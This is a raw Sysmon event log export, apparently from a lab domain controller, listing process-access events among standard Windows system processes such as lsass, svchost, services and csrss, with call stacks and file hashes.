08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}612716C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}612716C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}612716C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}612716C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0800-000000007F01}728C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}612924C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0500-000000007F01}648C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0800-000000007F01}728C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0500-000000007F01}648C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121032C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.730{5D479F2C-169E-5F84-0200-000000007F01}452464C:\Windows\System32\smss.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.684{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.684{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.684{5D479F2C-16A1-5F84-0C00-000000007F01}612924C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46888|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.668{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.668{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.668{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.668{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.652{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.652{5D479F2C-169F-5F84-0A00-000000007F01}856860C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0D00-000000007F01}1000C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19bbb|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.652{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.637{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.637{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.621{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.527{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.527{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.527{5D479F2C-169F-5F84-0A00-000000007F01}856860C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19e30|C:\Windows\system32\services.exe+19b29|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.533{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 